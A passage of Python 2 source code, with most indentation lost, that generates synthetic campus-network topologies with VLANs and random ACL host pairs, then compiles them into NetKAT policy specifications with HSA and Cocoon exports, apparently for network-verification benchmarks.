paths.append(p)
return '\n+ '.join(paths)
def cocoon_of_networkx(g):
targets = [n for (n, data) in filter(
lambda (n, data): data['type'] == 'router' or data['type'] == 'host',
g.nodes(data=True))]
# TODO: switch this to compute shortest path from all nodes to each router.
# Then, for each node for each target router, compute a policy for the next
# hop.
distances = {}
out_ports = {}
for sw in g:
if g.node[sw]['type'] == 'host':
continue
distances[sw] = {}
out_ports[sw] = {}
for r in targets:
if sw == r:
continue
# TODO: it's grossly inefficient to recompute the path for every
# switch.
path = networkx.shortest_path(g, source=sw, target=r)
distances[sw][r] = len(path) - 1
out_ports[sw][r] = g.node[sw]['ports'][path[1]]
return (distances, out_ports)
# Produce a new graph composing g1 and g2. Copy dictionary attributes.
def copy_compose(g1, g2):
g = networkx.Graph()
for n in g1.nodes() + g2.nodes():
g.add_node(n)
for (n1, n2) in g1.edges() + g2.edges():
g.add_edge(n1, n2)
for n in g1:
for k in g1.node[n]:
if type(g1.node[n][k]) == dict:
g.node[n][k] = dict(g1.node[n][k])
else:
g.node[n][k] = g1.node[n][k]
for n in g2:
for k in g2.node[n]:
if type(g2.node[n][k]) == dict:
g.node[n][k] = dict(g2.node[n][k])
else:
g.node[n][k] = g2.node[n][k]
return g
# Add a dictionary to each node mapping neighboring nodes to port numbers.
# Port numbers start at 2.
def add_ports_to_networkx(g, starting_port):
for n in g:
d = {}
p = starting_port
for neighbor in g[n].keys():
d[neighbor] = p
p += 1
g.node[n]['ports'] = d
# Sanity check on port assignments.
def check_networkx(g):
for n in g:
for neighbor in g[n].keys():
if neighbor not in g.node[n]['ports']:
print '%s %d not in ports for neighbor %s %d' % (
g.node[neighbor]['type'], neighbor, g.node[n]['type'], n)
assert(neighbor in g.node[n]['ports'])
# High-level spec for the Purdue network: All hosts are grouped by subnet, can
# communicate within the subnet, and inter-subnet traffic goes through an ACL.
class Spec0:
def __init__(self, local, remote):
self.local = local
self.remote = remote
def __str__(self):
return '%s\n\n+\n\n%s' % (self.local, self.remote)
# Spec0 refactored into an OpenFlow-friendly format of policy; topology for one
# big switch.
class Spec0_1:
def __init__(self, local, remote, host_topo, router_topo, host_switches):
self.local = local
self.remote = remote
self.host_topo = host_topo
self.router_topo = router_topo
self.host_switches = host_switches
def __str__(self):
return '''
( {host_topo} );
(
(( {local} )
+
( {remote} ))
;
( {router_topo} ))*
;
( {host_switches} ); port = 1
'''.format( host_switches=self.host_switches
, host_topo=self.host_topo
, router_topo=self.router_topo
, local=self.local
, remote=self.remote )
# Distribute access control to each LAN gateway.
class Spec1:
def __init__(self, local, host_to_router, router_to_router, router_to_host, host_switches):
self.local = local
self.host_to_router = host_to_router
self.router_to_router = router_to_router
self.router_to_host = router_to_host
self.host_switches = host_switches
def __str__(self):
return '''
( {local} )
+
( {host_switches} );
port = 0;
(
( {host_to_router} )
+
( {router_to_router} )
+
( {router_to_host} )
)* ;
( {host_switches} );
port = 1
'''.format( local=self.local
, host_to_router=self.host_to_router
, router_to_router=self.router_to_router
, router_to_host=self.router_to_host
, host_switches=self.host_switches )
class Spec1_1:
def __init__( self
, preface
, router_to_host_topo
, router_to_host_pol
, router_to_router_topo
, router_to_router_pol
, hosts):
self.preface = preface
self.router_to_host_topo = router_to_host_topo
self.router_to_host_pol = router_to_host_pol
self.router_to_router_topo = router_to_router_topo
self.router_to_router_pol = router_to_router_pol
self.hosts = hosts
def __str__(self):
return '''
( {hosts} ); port = 0;
( {preface} );
(
( ( {router_to_host_pol} )
+
( {router_to_router_pol} ) )
;
( ( {router_to_host_topo} )
+
( {router_to_router_topo} ) )
)*;
( {hosts} ); port = 1
'''.format( preface=self.preface
, router_to_host_topo = self.router_to_host_topo
, router_to_host_pol = self.router_to_host_pol
, router_to_router_topo = self.router_to_router_topo
, router_to_router_pol = self.router_to_router_pol
, hosts = self.hosts )
class Spec2_1:
def __init__( self
, preface
, router_to_host_topo
, router_to_host_pol
, router_to_router_topo
, router_to_router_pol
, router_to_router_preface
, router_to_router_tail
, hosts):
self.preface = preface
self.router_to_host_topo = router_to_host_topo
self.router_to_host_pol = router_to_host_pol
self.router_to_router_topo = router_to_router_topo
self.router_to_router_pol = router_to_router_pol
self.router_to_router_preface = router_to_router_preface
self.router_to_router_tail = router_to_router_tail
self.hosts = hosts
def __str__(self):
return '''
( {hosts} ); port = 0;
( {preface} );
(
(
( {router_to_router_tail} )
;
( {router_to_host_pol} )
+
( {router_to_router_preface} )
;
( {router_to_router_pol} )
) ; (
( {router_to_host_topo} )
+
( {router_to_router_topo} )
)
)*;
( {hosts} ); port = 1
'''.format( preface=self.preface
, router_to_host_topo = self.router_to_host_topo
, router_to_host_pol = self.router_to_host_pol
, router_to_router_topo = self.router_to_router_topo
, router_to_router_pol = self.router_to_router_pol
, router_to_router_preface = self.router_to_router_preface
, router_to_router_tail = self.router_to_router_tail
, hosts = self.hosts )
# Add L2 switching between routers.
class Spec2:
def __init__(self, local, host_to_router, router_to_router_topo, router_to_router_pol, router_to_host, host_switches):
self.local = local
self.host_to_router = host_to_router
self.router_to_router_topo = router_to_router_topo
self.router_to_router_pol = router_to_router_pol
self.router_to_host = router_to_host
self.host_switches = host_switches
def __str__(self):
return '''
( {local} )
+
( {host_switches} );
port = 0;
(
( {host_to_router} )
+
({router_to_router_pol});
( ({router_to_router_topo}); ({router_to_router_pol}) )*
+
( {router_to_host} )
)* ;
( {host_switches} );
port = 1
'''.format( local=self.local
, host_to_router=self.host_to_router
, router_to_router_topo=self.router_to_router_topo
, router_to_router_pol=self.router_to_router_pol
, router_to_host=self.router_to_host
, host_switches=self.host_switches )
# Add L2 switching between hosts and their gateways, randomly move some hosts
# out of their subnet LANs, and add VLANs.
class Spec3:
def __init__(self, preface, local_topos, local_pols, router_to_router_topo, router_to_router_pol, host_switches):
self.preface = preface
self.local_topos = local_topos
self.local_pols = local_pols
self.router_to_router_topo = router_to_router_topo
self.router_to_router_pol = router_to_router_pol
self.host_switches = host_switches
def __str__(self):
return '''
( {host_switches} );
port = 0;
( {preface} );
(
(
( {local_pols} )
+
( {router_to_router_pol} )
) ; (
( {local_topos} )
+
( {router_to_router_topo} )
)
)* ;
( {host_switches} );
port = 1
'''.format( preface=self.preface
, local_topos=self.local_topos
, local_pols=self.local_pols
, router_to_router_topo=self.router_to_router_topo
, router_to_router_pol=self.router_to_router_pol
, host_switches=self.host_switches )
# TODO: split router_to_router as well?
class PurdueNetwork:
def __init__(self, args):
self.num_lans = args.num_lans
self.num_hosts_per_lan = args.num_lan_hosts
self.num_acl_rules = args.num_acl_rules
self.num_routers = args.num_fabric_switches
self.num_switches_per_lan = args.num_lan_switches
self.args = args
self.next_id = 1
assert(0 < self.num_hosts_per_lan <= 256)
assert(1 < self.num_lans <= 16777216)
# Build virtual LANs.
def mkHost(lan_num, host_num, vlan):
ip = convert_to_ip(lan_num, host_num)
return Host(host_num, ip, vlan)
def mkLAN(lan_num):
subnet = convert_to_subnet(lan_num)
hosts = map(lambda i: mkHost(lan_num, self.get_next_id(), lan_num), range(self.num_hosts_per_lan))
return LAN(subnet, self.get_next_id(), [], hosts, lan_num)
self.lans = map(mkLAN, range(1,self.num_lans+1))
self.subnet_to_lan = {self.lans[i].subnet : i for i in xrange(len(self.lans)) }
# Build ACL.
self.acl_pairs = []
for i in xrange(self.num_acl_rules):
lan1idx = random.randrange(len(self.lans))
lan2idx = random.randrange(len(self.lans))
while lan1idx == lan2idx:
lan2idx = random.randrange(len(self.lans))
lan1 = self.lans[lan1idx]
lan2 = self.lans[lan2idx]
h1 = lan1.hosts[random.randrange(len(lan1.hosts))]
h2 = lan2.hosts[random.randrange(len(lan2.hosts))]
self.acl_pairs.append((h1, h2))
def lan_of_subnet(self, subnet):
return self.lans[self.subnet_to_lan[subnet]]
def lan_of_ip(self, ip):
parts = ip.split('.')
return self.lan_of_subnet('%s.%s.%s' % (parts[0], parts[1], parts[2]))
def get_next_id(self):
rv = self.next_id
self.next_id += 1
return rv
def gen_local_forwarding(self):
local_forwarding = []
for lan in self.lans:
# Build local forwarding.
local_pred = '\n+ '.join(
map(lambda h: 'sw = %s; port = 0' % h.mac, lan.hosts))
local_forwarding_act = '\n+ '.join(
map(lambda h: 'ip4Dst = %d; sw := %s; port := 1' % (int_of_ip(h.ip), h.mac), lan.hosts))
local_forwarding.append('( %s )\n\n;\n\n( %s )' % (local_pred, local_forwarding_act))
return local_forwarding
def gen_spec_0(self):
# Local forwarding.
local_forwarding = self.gen_local_forwarding()
# Non-local forwarding.
nonlocal_forwarding = []
for lan in self.lans:
local_pred = '\n+ '.join(map(lambda h: 'sw = %s; port = 0' % h.mac, lan.hosts))
local_ip = '\n+ '.join(map(lambda h: 'ip4Dst = %d' % int_of_ip(h.ip), lan.hosts))
nonlocal_forwarding.append('(%s); ~(%s)' % (local_pred, local_ip))
# Build ACL forwarding.
all_hosts = [h for lan in self.lans for h in lan.hosts]
acl_forwarding = '\n+ '.join(map(lambda h: 'ip4Dst = %d; sw := %s; port := 1' % (int_of_ip(h.ip), h.mac), all_hosts))
if self.args.export_hsa:
and_sym = ' and'
else:
and_sym = ';'
acl = ';\n'.join(['~(ip4Src = %d%s ip4Dst = %d)' % (int_of_ip(h1.ip), and_sym, int_of_ip(h2.ip)) for (h1, h2) in self.acl_pairs])
spec_0 = Spec0(
'( %s )' % '\n\n+\n\n'.join(local_forwarding),
'( %s )\n\n;\n\n( %s )\n\n;\n\n( %s )' % ( '\n+ '.join(nonlocal_forwarding),
acl,
acl_forwarding))
return spec_0
def gen_spec_0_1(self):
switch = self.get_next_id()
# Local forwarding.
local_forwarding = []
for lan in self.lans:
local_forwarding.append('\n+ '.join(['sw = %d; port = %d; ip4Dst = %d; port := %d' % (
switch, h1.mac, int_of_ip(h2.ip), h2.mac) for h1 in lan.hosts for h2 in lan.hosts]))
# Topology connecting each host to the single big switch.
host_topo = '\n+ '.join(['sw = %d; port = 0; sw := %d; port := %d' % (
h.mac, switch, h.mac) for lan in self.lans for h in lan.hosts])
router_topo = '\n+ '.join(['sw = %d; port = %d; sw := %d; port := 1' % (
switch, h.mac, h.mac) for lan in self.lans for h in lan.hosts])
# Non-local forwarding filter.
nonlocal_predicate = []
for lan in self.lans:
if self.args.export_hsa:
or_sym = ' or '
else:
or_sym = '\n+ '
local_pred = or_sym.join(map(lambda h: 'port = %d' % h.mac, lan.hosts))
local_ip = or_sym.join(map(lambda h: 'ip4Dst = %d' % int_of_ip(h.ip), lan.hosts))
nonlocal_predicate.append('sw = %d; (%s); ~(%s)' % (switch, local_pred, local_ip))
# Build ACL forwarding.
all_hosts = [h for lan in self.lans for h in lan.hosts]
acl_forwarding = '\n+ '.join(map(lambda h: 'ip4Dst = %d; port := %d' % (int_of_ip(h.ip), h.mac), all_hosts))
if self.args.export_hsa:
and_sym = ' and'
else:
and_sym = ';'
acl = ';\n'.join(['~(ip4Src = %d%s ip4Dst = %d)' % (int_of_ip(h1.ip), and_sym, int_of_ip(h2.ip)) for (h1, h2) in self.acl_pairs])
spec_0 = Spec0_1(
'( %s )' % '\n+\n'.join(local_forwarding),
'( %s )\n;\n( %s )\n;\n( %s )' % ( '\n+ '.join(nonlocal_predicate),
acl,
acl_forwarding),
host_topo,
router_topo,
'\n+ '.join(['sw = %d' % h.mac for lan in self.lans for h in lan.hosts]))
if self.args.export_hsa:
out = self.args.export_hsa
out.write('### SPEC 0 ###')
out.write('--- NETKAT SWITCH FUNCTION ---\n')
out.write('%s\n+\n%s\n' % (spec_0.local, spec_0.remote))
out.write('\n')
out.write('--- TOPOLOGY ---\n')
for lan in self.lans:
for h in lan.hosts:
out.write('(HOST %d, %d)--(SWITCH %d, %d)\n' % (h.mac, 1, switch, h.mac))
out.write('\n')
out.write('--- HOSTS ---\n')
for lan in self.lans:
for h in lan.hosts:
out.write('HOST %d, %s\n' % (h.mac, h.ip))
out.write('\n')
out.write('--- ACL (BLACKLIST IP PAIRS) ---\n')
for (src, dst) in self.acl_pairs:
out.write('(%s, %s)\n' % (src.ip, dst.ip))
out.write('\n')
return spec_0
def gen_spec_1(self, spec0):
# Non-local forwarding.
nonlocal_forwarding_to_router = []
local_forwarding_from_router = []
router_forwarding_to_router = []
for lan in self.lans:
# From host to router.
local_pred = '\n+ '.join(map(lambda h: 'sw = %s; port = 0' % h.mac, lan.hosts))
local_ip = '\n+ '.join(map(lambda h: 'ip4Dst = %d' % int_of_ip(h.ip), lan.hosts))
nonlocal_forwarding_to_router.append('(%s); ~(%s); sw := %d' % (local_pred, local_ip, lan.router))
# From router to host.
local_forwarding_act = '\n+ '.join(
map(lambda h: 'ip4Dst = %d; sw := %s; port := 1' % (int_of_ip(h.ip), h.mac), lan.hosts))
local_acl_pairs = filter(lambda (h1, h2): self.lan_of_ip(h2.ip) == lan, self.acl_pairs)
local_acl = '\n+ '.join(['ip4Src = %d; drop' % int_of_ip(h1.ip) for (h1, h2) in local_acl_pairs])
if len(local_acl) > 0:
local_forwarding_from_router.append(
'sw = %d; port = 1; (%s); (%s)' % (lan.router, local_acl, local_forwarding_act))
else:
local_forwarding_from_router.append(
'sw = %d; port = 1; (%s)' % (lan.router, local_forwarding_act))
# From router to router.
router_forwarding_to_router.append(
'\n+ '.join(
['ip4Dst = %d; sw := %d; port := 1' % (
int_of_ip(host.ip), self.lan_of_ip(host.ip).router) for host in lan.hosts]))
# From router to router.
router_to_router = '( %s )\n\n;\n\n( %s )' % (
'\n+ '.join(['sw = %d; port = 0' % lan.router for lan in self.lans]),
'\n+ '.join(router_forwarding_to_router))
return Spec1(
spec0.local
, '\n+ '.join(nonlocal_forwarding_to_router)
, router_to_router
, '\n+ '.join(local_forwarding_from_router)
, '\n+ '.join(['sw = %d' % h.mac for lan in self.lans for h in lan.hosts]))
def gen_spec_1_1(self):
# Preface: Move packets emitted from hosts to the router.
preface = []
for lan in self.lans:
for h in lan.hosts:
preface.append('sw = %d; sw := %d; port := %d' % (h.mac, lan.router, h.mac))
preface = 'port = 0; ( %s )' % ('\n+ '.join(preface))
router_to_host_topo = []
for lan in self.lans:
for h in lan.hosts:
router_to_host_topo.append('sw = %d; port = %d; sw := %d; port := 1' % (lan.router, h.mac, h.mac))
router_to_host_topo = '\n+ '.join(router_to_host_topo)
acl = '; '.join(['~(ip4Src = %d; ip4Dst = %d)' % (
int_of_ip(src.ip), int_of_ip(dst.ip))
for (src, dst) in self.acl_pairs])
router_to_host_pol = []
for lan in self.lans:
local_action = ' + '.join(['ip4Dst = %d; port := %d' % (int_of_ip(h.ip), h.mac) for h in lan.hosts])
local_pred = ' + '.join(['port = %d' % h2.mac for h2 in lan.hosts])
router_to_host_pol.append('sw = %d; ( %s ); ( %s )' % (
lan.router, local_pred, local_action))
router_to_host_pol.append('sw = %d; ~( %s ); ( %s ); ( %s )' % (
lan.router, local_pred, acl, local_action))
router_to_host_pol = '\n+ '.join(router_to_host_pol)
router_to_router_topo = []
for lan in self.lans:
for other_lan in filter(lambda x: x != lan, self.lans):
router_to_router_topo.append('sw = %d; port = %d; sw := %d; port := %d' % (
lan.router, other_lan.router,
other_lan.router, lan.router))
router_to_router_topo = '\n+ '.join(router_to_router_topo)
router_to_router_pol = []
for lan in self.lans:
tmp = []
for h in lan.hosts:
tmp.append('ip4Dst = %d' % (int_of_ip(h.ip)))
other_routers = ['sw = %d' % other_lan.router for other_lan in filter(lambda x: x != lan, self.lans)]
router_to_router_pol.append('( %s );\n( %s );\nport := %d' % (
'\n+ '.join(other_routers),
'\n+ '.join(tmp),
lan.router))
router_to_router_pol = '\n\n+\n\n'.join(router_to_router_pol)
hosts = '\n+ '.join(['sw = %d' % h.mac for lan in self.lans for h in lan.hosts])
return Spec1_1( preface
, router_to_host_topo
, router_to_host_pol
, router_to_router_topo
, router_to_router_pol
, hosts)
def gen_spec_2_1(self, spec11):
# Local and host-to-router are unchanged from spec1. Router-to-router
# now replaces the ethDst with the target gateway router at the source
# gateway router, and router-to-host reconstitutes the appropriate
# ethDst.
# Build router-to-router network.
g = connected_waxman_graph(self.num_routers)
relabel = {i:self.get_next_id() for i in xrange(self.num_routers)}
for n in g:
g.node[n]['type'] = 'switch'
networkx.relabel_nodes(g, relabel, copy=False)
for lan in self.lans:
g.add_node(lan.router, type='router')
g.add_edge(lan.router, relabel[random.randrange(self.num_routers)])
add_ports_to_networkx(g, self.next_id)
self.routers = g
router_to_router_preface = []
for lan in self.lans:
tmp = []
for h in lan.hosts:
tmp.append('ip4Dst = %d' % (int_of_ip(h.ip)))
other_routers = ['sw = %d' % other_lan.router for other_lan in filter(lambda x: x != lan, self.lans)]
router_to_router_preface.append('( %s );\n( %s );\nethDst := %d' % (
'\n+ '.join(other_routers),
'\n+ '.join(tmp),
lan.router))
router_to_router_preface = '\n\n+\n\n'.join(router_to_router_preface + ['pass'])
router_to_router_tail = '\n+ '.join(['sw = %d; ip4Dst = %d; ethDst := %d' % (
lan.router, int_of_ip(h.ip), h.mac) for lan in self.lans for h in lan.hosts]
+ ['pass'])
router_to_router_pol = spp_of_networkx(self.routers)
router_to_router_topo = topology_of_networkx(self.routers)
return Spec2_1( spec11.preface
, spec11.router_to_host_topo
, spec11.router_to_host_pol
, router_to_router_topo
, router_to_router_pol
, router_to_router_preface
, router_to_router_tail
, spec11.hosts)
def gen_spec_2(self, spec1):
# Local and host-to-router are unchanged from spec1. Router-to-router
# now replaces the ethDst with the target gateway router at the source
# gateway router, and router-to-host reconstitutes the appropriate
# ethDst.
# Build router-to-router network.
g = connected_waxman_graph(self.num_routers)
relabel = {i:self.get_next_id() for i in xrange(self.num_routers)}
for n in g:
g.node[n]['type'] = 'switch'
networkx.relabel_nodes(g, relabel, copy=False)
for lan in self.lans:
g.add_node(lan.router, type='router')
g.add_edge(lan.router, relabel[random.randrange(self.num_routers)])
add_ports_to_networkx(g, self.next_id)
self.routers = g
router_to_host_preface = []
for lan in self.lans:
p = '\n+ '.join(['ip4Dst = %d; ethDst := %d' % (int_of_ip(h.ip), h.mac) for h in lan.hosts])
router_to_host_preface.append(
'sw = %d; ethDst = %d; ( %s ); port := 1' % (lan.router, lan.router, p))
router_to_host = '( %s )\n\n+\n\n( %s )' % ('\n+ '.join(router_to_host_preface), spec1.router_to_host)
router_to_router_topo = topology_of_networkx(self.routers)
router_to_router_pol = spp_of_networkx(self.routers)
return Spec2(spec1.local, spec1.host_to_router, router_to_router_topo, router_to_router_pol, router_to_host, spec1.host_switches)
def gen_spec_3(self, spec2):
# Router-to-router remains the same, but host-to-router and
# router-to-host change to acount for (a) local L2 switching and (b)
# adding VLAN and moving some subnet hosts to different physical LANs.
# Permute hosts.
host_to_lan = {}
host_to_vrouter = {}
remote_hosts = {lan.vlan:set([]) for lan in self.lans}
vlan_to_hosts = {lan.vlan:set([]) for lan in self.lans}
for lan in self.lans:
for h in lan.hosts:
host_to_vrouter[h] = lan.router
vlan_to_hosts[h.vlan].add(h)
if (random.random() < PROB_NONLOCAL_HOST):
lan.hosts.remove(h)
choice = random.choice(self.lans)
choice.hosts.append(h)
host_to_lan[h] = choice
remote_hosts[h.vlan].add(h)
else:
host_to_lan[h] = lan
# Generate random L2 topologies for each LAN.
for lan in self.lans:
g = connected_waxman_graph(self.num_switches_per_lan)
relabel = {i:self.get_next_id() for i in xrange(self.num_switches_per_lan)}
for n in g:
g.node[n]['type'] = 'switch'
networkx.relabel_nodes(g, relabel, copy=False)
add_ports_to_networkx(g, 2)
# Attach router.
attach_point = random.randrange(self.num_switches_per_lan)
g.add_node(lan.router, type='router', ports={relabel[attach_point]:1})
g.add_edge(lan.router, relabel[attach_point])
ports_d = g.node[relabel[attach_point]]['ports']
ports = ports_d.values()
if len(ports) > 0:
ports.sort()
ports_d[lan.router] = ports[-1] + 1
else:
ports_d[lan.router] = 2
# Attach hosts.
for h in lan.hosts:
attach_point = random.randrange(self.num_switches_per_lan)
g.add_node(h.mac, type='host', ports={relabel[attach_point]:1}, host=h)
g.add_edge(h.mac, relabel[attach_point])
ports_d = g.node[relabel[attach_point]]['ports']
ports = ports_d.values()
if len(ports) > 0:
ports.sort()
ports_d[h.mac] = ports[-1] + 1
else:
ports_d[h.mac] = 2
check_networkx(g)
lan.g = g
        if self.args.debug:
for lan in self.lans:
for n in lan.g:
d = lan.g.node[n]
sys.stderr.write('%s %d: %s\n' % (d['type'], n, d['ports']))
sys.stderr.write('\n')
preface = []
topo = []
pol = []
for lan in self.lans:
# Generate host preface:
# sw = h.id; port = 0; ip4Src = h.ip; vlan := h.vlan; sw := neighbor(h); port := neighbor(h)
for h in lan.hosts:
neighbor = lan.g[h.mac].keys()[0]
neighbor_port = lan.g.node[neighbor]['ports'][h.mac]
preface.append(
'sw = %d; port = 0; ip4Src = %d; vlan := %d; sw := %d; port := %d' % (
h.mac, int_of_ip(h.ip), h.vlan, neighbor, neighbor_port
))
# Generate intra-LAN L2 forwarding.
t = topology_of_networkx(lan.g)
l2 = spp_of_networkx(lan.g)
assert(l2)
# Attach VLANs at the hosts.
attach_vlan = ['sw = %d; ~(ethDst = %d); vlan := %d' % (h.mac, h.mac, h.vlan) for h in lan.hosts]
# For outgoing traffic, if the packet VLAN is the same as the
# router VLAN:
# ... and the destination host is part of THE SAME VLAN, then write
# the ethDst to be the router associated with the target host.
if len(remote_hosts[lan.vlan]) > 0:
p1 = 'sw = %d; port = 1; vlan = %d; ( %s )' % (
lan.router, lan.vlan,
'\n+ '.join(['ip4Dst = %d; ethDst := %d' % (
int_of_ip(h.ip), host_to_lan[h].router)
for h in remote_hosts[lan.vlan]]))
else:
p1 = 'drop'
# ... and the destination host is part of a DIFFERENT VLAN, then
# write the ethDst to be the router associated with the target
# VLAN.
#
# NB: The NetKAT decision procedure doesn't support IP masks, so we
# need to enumerate every other host.
p2 = 'sw = %d; port = 1; vlan = %d;\n( %s )' % (
lan.router,
lan.vlan,
'\n+ '.join(['ip4Dst = %d; ethDst := %d' % (
int_of_ip(h.ip),
host_to_vrouter[h])
for h in host_to_vrouter if h.vlan != lan.vlan]))
# For outgoing traffic, if the packet VLAN is NOT the same as the
# router VLAN, then send it to the router associated with its VLAN.
p3 = 'sw = %d; port = 1; ( %s )' % (lan.router,
'\n+ '.join(['vlan = %d; ethDst := %d' % (lan2.vlan, lan2.router)
for lan2 in filter(lambda l: l != lan, self.lans)]))
# For incoming traffic, if the packet VLAN is the same as the
# router VLAN, then:
# ... if the target host is in the LAN, write the ethDst of the
# target host.
hosts_in_lan_and_vlan = filter(lambda h: h.vlan == lan.vlan, lan.hosts)
if len(hosts_in_lan_and_vlan) > 0:
p4 = 'sw = %d; ~(port = 1); vlan = %d; ( %s )' % (
lan.router, lan.vlan,
'\n+ '.join(['ip4Dst = %d; ethDst := %d' % (
int_of_ip(h.ip), h.mac)
for h in hosts_in_lan_and_vlan]))
else:
p4 = 'drop'
# ... if the target host is remote, write the ethDst of the router
# associated with this host.
if len(remote_hosts[lan.vlan]) > 0:
p5 = 'sw = %d; ~(port = 1); vlan = %d; ( %s )' % (
lan.router, lan.vlan,
'\n+ '.join(['ip4Dst = %d; ethDst := %d' % (
int_of_ip(h.ip), host_to_lan[h].router)
for h in remote_hosts[lan.vlan]]))
else:
p5 = 'drop'
# For incoming traffic, if the packet VLAN is NOT the same as the
# router VLAN, then:
# The packet is intra-VLAN traffic, but its LAN houses a remote
# host for that VLAN.
nonlocal_hosts = filter(lambda h: h.vlan != lan.vlan, lan.hosts)
if len(nonlocal_hosts) > 0:
p6 = 'sw = %d; ~(port = 1); ( %s )' % (lan.router,
'\n+ '.join(['vlan = %d; ip4Dst = %d; ethDst := %d' % (
h.vlan, int_of_ip(h.ip), h.mac)
for h in nonlocal_hosts]))
else:
p6 = 'drop'
# The packet is inter-VLAN traffic destined for a host in this
# router's VLAN, and:
# ... the target host is in this LAN.
if self.args.export_hsa:
and_sym = ' and'
else:
and_sym = ';'
acl = ';\n '.join(['~(ip4Src = %d%s ip4Dst = %d)' % (int_of_ip(src.ip), and_sym, int_of_ip(dst.ip))
for (src, dst) in filter(lambda (src, dst): dst in vlan_to_hosts[lan.vlan], self.acl_pairs)])
if acl == '':
acl = 'pass'
p7 = 'sw = %d; ~(port = 1); ~(vlan = %d);\n( %s );\n( %s ); vlan := %d' % (
lan.router,
lan.vlan,
'\n+ '.join(['ip4Dst = %d; ethDst := %d' % (
int_of_ip(h.ip), h.mac)
for h in filter(lambda h: h.vlan == lan.vlan, lan.hosts)]),
acl, lan.vlan)
# ... the target host is elsewhere.
if len(remote_hosts[lan.vlan]) > 0:
p8 = 'sw = %d; ~(port = 1); ~(vlan = %d); \n( %s );\n( %s ); vlan := %d' % (
lan.router,
lan.vlan,
'\n+ '.join(
['ip4Dst = %d; ethDst := %d' % (int_of_ip(h.ip), host_to_lan[h].router)
for h in remote_hosts[lan.vlan]]),
acl, lan.vlan)
else:
p8 = 'drop'
topo.append(t)
pol.append("""
( {l2} )
+
((
( {p1} )
+
( {p2} )
+
( {p3} )
) ; (
{router_to_router_pol}
))
+
((
( {p4} )
+
( {p6} )
+
( {p7} )
) ; (
{l2}
))
+
( {p5} )
+
( {p8} )
""".format(
l2=l2,
p1=p1,
p2=p2,
p3=p3,
p4=p4,
p5=p5,
p6=p6,
p7=p7,
p8=p8,
router_to_router_pol=spec2.router_to_router_pol))
spec3 = Spec3(
'\n+ '.join(preface),
'\n\n+\n\n'.join(topo),
'\n\n+\n\n'.join(pol),
spec2.router_to_router_topo,
spec2.router_to_router_pol,
spec2.hosts)
if self.args.export_hsa:
out = self.args.export_hsa
            out.write('### SPEC 3 ###\n')
out.write('--- NETKAT SWITCH FUNCTION ---\n')
out.write('%s\n+\n%s\n' % (spec3.local_pols, spec3.router_to_router_pol))
out.write('\n')
out.write('--- TOPOLOGY ---\n')
            # Export each LAN topology and the router fabric once.
            for g in [lan.g for lan in self.lans] + [self.routers]:
                export_topology_of_networkx(g, out)
out.write('\n')
out.write('--- HOSTS ---\n')
for lan in self.lans:
for h in lan.hosts:
out.write('HOST %d, %s\n' % (h.mac, h.ip))
out.write('\n')
out.write('--- ACL (BLACKLIST IP PAIRS) ---\n')
for (src, dst) in self.acl_pairs:
out.write('(%s, %s)\n' % (src.ip, dst.ip))
out.write('\n')
return spec3
def export_cocoon(self):
out = self.args.export_cocoon
# Make a new graph that connects the zones to the router fabric.
g = self.routers
for lan in self.lans:
g = copy_compose(lan.g, g)
for n in lan.g:
for neighbor in lan.g.node[n]['ports']:
g.node[n]['ports'][neighbor] = lan.g.node[n]['ports'][neighbor]
# FUNCTION cHost
out.write('function cHost(hid_t hid): bool =\n')
out.write(' or\n'.join([" hid == 64'd%d" % h.mac for lan in self.lans for h in lan.hosts]))
out.write('\n')
# FUNCTION cVlan
out.write('function cVlan(vid_t vid): bool =\n')
out.write(' or\n'.join([" vid == 12'd%d" % lan.vlan for lan in self.lans]))
out.write('\n')
# FUNCTION vidRouterMAC
vid_map = ["vid == 12'd%d: 48'h%x;" % (lan.vlan, lan.router)
for lan in self.lans]
vid_map = '\n '.join(vid_map)
out.write('''
function vidRouterMAC(vid_t vid): MAC =
case {{
{vid_map}
default: 48'h0;
}}
'''.format(vid_map = vid_map))
# FUNCTION ip2vid
ip_map = ["ip == 32'h%x: 12'd%d;" % (int_of_ip(h.ip), h.vlan) for lan in self.lans for h in lan.hosts]
ip_map = '\n '.join(ip_map)
out.write('''
function ip2vlan(IP4 ip): vid_t =
case {{
{ip_map}
default: 12'd0;
}}
'''.format(ip_map = ip_map))
# FUNCTION hid2ip
m = ["hid == 64'd%d: 32'h%x;" % (h.mac, int_of_ip(h.ip)) for lan in self.lans for h in lan.hosts]
m = '\n '.join(m)
out.write('''
function hid2ip(hid_t hid): IP4 =
case {{
{m}
default: 32'd0;
}}
'''.format(m = m))
# FUNCTION ip2hid
m = ["ip == 32'h%x: 64'd%d;" % (int_of_ip(h.ip), h.mac) for lan in self.lans for h in lan.hosts]
m = '\n '.join(m)
out.write('''
function ip2hid(IP4 ip): hid_t =
case {{
{m}
default: 64'd0;
}}
'''.format(m = m))
# FUNCTION acl
m = ["(ip.src == 32'h%x and ip.dst == 32'h%x)" % (
int_of_ip(src.ip), int_of_ip(dst.ip))
for (src, dst) in self.acl_pairs]
m = ' or \n '.join(m)
out.write('''
function acl(vid_t srcvlan, vid_t dstvlan, ip4_t ip): bool =
{m}
'''.format(m = m))
# FUNCTION aclSrc, aclDst (derived)
out.write('''
function aclSrc(vid_t srcvlan, vid_t dstvlan, ip4_t ip): bool = acl(srcvlan, dstvlan, ip)
function aclDst(vid_t srcvlan, vid_t dstvlan, ip4_t ip): bool = true
''')
# FUNCTION cZone
m = ["zid == 32'd%d" % lan.vlan for lan in self.lans] + ["zid == 32'd0"]
m = ' or \n '.join(m)
out.write('''
function cZone(zid_t zid): bool =
{m}
'''.format(m = m))
# FUNCTION cRouter
m = ["rid == 64'd%d" % lan.router for lan in self.lans]
m = ' or \n '.join(m)
out.write('''
function cRouter(hid_t rid): bool =
{m}
'''.format(m = m))
# FUNCTION portConnected
out.write('function portConnected(pid_t pid): bool = true (* assume all ports are connected *)\n')
# FUNCTION routerPortZone
zone_router_ports = []
for lan in self.lans:
zone_router_ports += ["pid == pid_t{64'd%d, 16'd%d}: 32'd%d;" % (
lan.router, port, lan.vlan)
for port in lan.g.node[lan.router]['ports'].values()]
zone_router_ports = '\n '.join(zone_router_ports)
out.write('''
function routerPortZone(pid_t pid): zid_t =
case {{
{zone_router_ports}
default: 32'd0;
}}
'''.format( zone_router_ports = zone_router_ports ))
# FUNCTION pid2mac
hosts = ["pid == pid_t{64'd%d, 16'd1}: 48'h%x;" % ( h.mac, h.mac)
for lan in self.lans for h in lan.hosts]
hosts = '\n '.join(hosts)
